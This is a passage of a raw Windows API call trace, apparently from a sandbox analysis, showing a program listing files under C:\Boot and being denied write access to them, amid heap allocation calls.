returned 0x88400 [0083.993] FindFirstFileExW (in: lpFileName="C:\\Boot\\pt-PT\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x77fd0 [0083.993] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.993] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0083.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0083.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0083.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.994] AreFileApisANSI () returned 1 [0083.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pt-PT\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pt-PT\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0083.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0083.995] AreFileApisANSI () returned 1 [0083.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0083.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 30 [0083.995] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.995] GetFileType (hFile=0x340) returned 0x1 [0083.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.995] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.995] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.995] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.995] CloseHandle (hObject=0x340) returned 1 [0083.996] AreFileApisANSI () returned 1 [0083.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0083.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 30 [0083.996] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.996] GetLastError () returned 0x5 [0083.996] GetLastError () returned 0x5 [0083.996] SetLastError (dwErrCode=0x5) [0083.996] GetLastError () returned 0x5 [0083.996] SetLastError (dwErrCode=0x5) [0083.996] GetLastError () returned 0x5 [0083.996] SetLastError (dwErrCode=0x5) [0083.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.996] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6714dc, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0083.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0083.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.997] AreFileApisANSI () returned 1 [0083.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pt-PT\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pt-PT\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0083.997] AreFileApisANSI () returned 1 [0083.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0083.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pt-PT\\memtest.exe.mui") returned 30 [0083.998] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.998] GetFileType (hFile=0x340) returned 0x1 [0083.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.998] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.998] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.998] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.998] CloseHandle (hObject=0x340) returned 1 [0083.999] AreFileApisANSI () returned 1 [0083.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0083.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pt-PT\\memtest.exe.mui") returned 30 [0083.999] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.999] GetLastError () returned 0x5 [0083.999] GetLastError () returned 0x5 [0083.999] SetLastError (dwErrCode=0x5) [0083.999] GetLastError () returned 0x5 [0083.999] SetLastError (dwErrCode=0x5) [0083.999] GetLastError () returned 0x5 [0083.999] SetLastError (dwErrCode=0x5) [0083.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.999] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x693f8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧뎠")) returned 0 [0083.999] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0083.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0084.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0084.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0084.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0084.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0084.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0084.000] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.000] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.000] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.000] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0084.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.000] AreFileApisANSI () returned 1 [0084.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\qps-ploc", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\qps-ploc", lpUsedDefaultChar=0x0) returned 17 [0084.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.000] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.000] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.001] AreFileApisANSI () returned 1 [0084.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0084.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7a8d8 [0084.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x7a8d8, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\qps-ploc") returned 17 [0084.001] CreateFileW (lpFileName="C:\\Boot\\qps-ploc" (normalized: "c:\\boot\\qps-ploc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.001] GetLastError () returned 0x5 [0084.001] GetLastError () returned 0x5 [0084.001] SetLastError (dwErrCode=0x5) [0084.001] GetLastError () returned 0x5 [0084.001] SetLastError (dwErrCode=0x5) [0084.001] GetLastError () returned 0x5 [0084.001] SetLastError (dwErrCode=0x5) [0084.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a8d8 | out: hHeap=0x20000) returned 1 [0084.001] AreFileApisANSI () returned 1 [0084.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0084.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7a9c8 [0084.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x7a9c8, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\qps-ploc") returned 17 [0084.001] CreateFileW (lpFileName="C:\\Boot\\qps-ploc" (normalized: "c:\\boot\\qps-ploc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.001] GetLastError () returned 0x5 [0084.001] GetLastError () returned 0x5 [0084.001] SetLastError (dwErrCode=0x5) [0084.001] GetLastError () returned 0x5 [0084.001] SetLastError (dwErrCode=0x5) [0084.001] GetLastError () returned 0x5 [0084.002] SetLastError (dwErrCode=0x5) [0084.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a9c8 | out: hHeap=0x20000) returned 1 [0084.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 